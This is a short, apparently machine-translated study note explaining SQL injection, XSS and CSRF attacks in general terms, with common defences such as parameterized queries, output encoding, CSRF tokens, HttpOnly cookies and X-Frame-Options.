web security

Common web security and protection principles

• sql injection principle

  • It is submitted by the SQL commands inserted into a Web form or enter a domain name or page request query string, and ultimately to deceive the server to execute malicious SQL commands

• In general the following points

  • Never trust user input, to verify the user's input, by a regular expression, or to limit the length of single and double quotation marks "-" conversion, etc.
  • Never use dynamic assembly SQL, you can use parameterized SQL or stored procedures directly access data query
  • Never use administrator privileges database connection, use a separate authority limited database connection for each application
  • Do not store confidential information in plain text, encrypt or hash out passwords and sensitive information

XSS principle and Prevention

• Xss (cross-site scripting) attack refers to the attacker to insert malicious Web page in html tag or javascript code. For example: the attacker in the forums to put a seemingly safe link that users click to cheat, steal private information in the cookie; or add a malicious attacker form in the forums, when the user submits the form, yet the information transfer to the attacker's server rather than the user originally thought of trusted sites

XSS prevention methods

• First, the local code and user input variables need to be carefully checked for length and "<", ">", ";", " '" characters such as filter; secondly any content page must be written before encode, avoid html tag does not care to get out. This is a good level, at least you can block more than half of XSS attacks

XSS and CSRF Is there any difference?

• XSS is access to information, users do not need to know in advance the code pages and other data packets. CSRF is completed instead of the user's specified actions, users need to know the code for the other pages and data packets. To complete a CSRF attack, the victim must complete two steps in sequence
• Login trusted site A, and generates Cookie locally
• Without out of A, B visit dangerous websites

CSRF defense

• CSRF service side ways and like a lot, but the general idea is the same, that is, increase the client page pseudo-random number
• By means of codes

Whether Understanding Web injection attacks (the most common XSS and CSRF)?

• SQL Injection

  • The SQL command to insert a form or enter a URL query string submitted to deceive the SQL server to achieve the purpose to execute malicious

• XSS (Cross Site Script), cross-site scripting attacks

  • Attacker to insert malicious code in the page when a user browsing the page, execute malicious code embedded to achieve the purpose of attack

• CSRF (Cross Site Request Forgery), cross-site request forgery

  • Forge legitimate requests, allowing users access to logged in unknowingly by the user to achieve the attack purpose trust

How to prevent Web front-end attack?

• Do not trust any external incoming data

  • Checking for a user input as the format related, such as filtration

• Do not trust any incoming third-party data

  • Use CORS, provided Access-Control-Allow-Origin

• Cookie safer use

  • Set Cookie to HttpOnly, prohibit the operation of JavaScript Cookie

• Prevents the page from being embedded in other sites as iframe

  • Server set X-Frame-Options header in response, to prevent the page being built